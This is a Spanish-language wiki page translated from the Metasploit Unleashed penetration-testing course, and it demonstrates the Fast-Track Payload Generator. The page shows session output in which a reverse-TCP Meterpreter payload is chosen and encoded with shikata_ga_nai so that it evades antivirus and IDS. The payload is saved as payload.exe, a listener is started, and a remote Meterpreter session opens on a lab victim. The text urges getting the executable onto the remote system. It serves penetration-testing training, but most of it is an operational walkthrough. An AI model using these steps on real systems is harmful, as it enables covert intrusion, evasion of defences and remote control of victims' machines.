Payload Generator

De www.metasploit-es.com.ar

SQL PWNAGE

El generador de Payload Fast Track crea Payloads Metasploit para usted con un clic de un botón. Sin embargo debemos, recordar los comandos con msfpayload pueden ser complicados, pero el Generadorde Fast Track simplifica el trabajo para usted! 

Fast-Track Main Menu:

    Fast-Track - Where it's OK to finish in under 3 minutes...
    Version: v4.0
    Written by: David Kennedy (ReL1K)
    http://www.securestate.com
    http://www.thepentest.com

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Microsoft SQL Tools
    4.  Mass Client-Side Attack
    5.  Exploits
    6.  Binary to Hex Payload Converter
    7.  Payload Generator
    8.  Fast-Track Tutorials
    9.  Fast-Track Changelog
    10. Fast-Track Credits
    11. Exit

    Enter the number: 7
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.

#####################################
###                               ###
### Metasploit Payload Generator  ###
###                               ###
### Written by: Dave Kennedy      ###
### aka ReL1K                     ###
###                               ###
#####################################
#####################################


The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.

This will also encode your payload to get past most AV and
IDS/IPS.


What payload do you want to generate:

Name:                                Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Reflective Reverse VNC          Spawn a VNC server on victim and send back to attacker.
6. Windows Reflective Reverse Meterpreter  Spawn a Meterpreter shell on victim through Reflective to attacker.

Enter choice (example 1-6): 2

Below is a list of encodings to try and bypass AV.

Select one of the below, Avoid_UTF8_tolower usually gets past them.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2

Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 10.211.55.130
Enter the port of the Listener: 9090

Do you want to create an EXE or Shellcode

1. Executable
2. Shellcode

Enter your choice: 1
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 310
Options: LHOST=10.211.55.130,LPORT=9090,ENCODING=shikata_ga_nai


A payload has been created in this directory and is named 'payload.exe'. Enjoy!


Do you want to start a listener to receive the payload yes or no: yes

Launching Listener...
***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


Tenga en cuenta que cuando un Payload es creado, Fast-Track automáticamente puede configurar un escucha para que acepte la conexión. Ahora todo lo que tienes que hacer es conseguir el ejecutable en el sistema remoto. Una vez ejecutado: 

***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1078)

meterpreter >

Acabamos de enterarnos de cómo crear payloads, utilizando Fast-Track framework y, finalmente, tener acceso a un sistema que utiliza payloads creado por el Metasploit Framework!



© Offensive Security 2009 

Original by www.offensive-security.com/metasploit-unleashed/
Traslated by tundervirld
Obtenido de «http://www.metasploit-es.com.ar/wiki/index.php/Payload_Generator»
Herramientas personales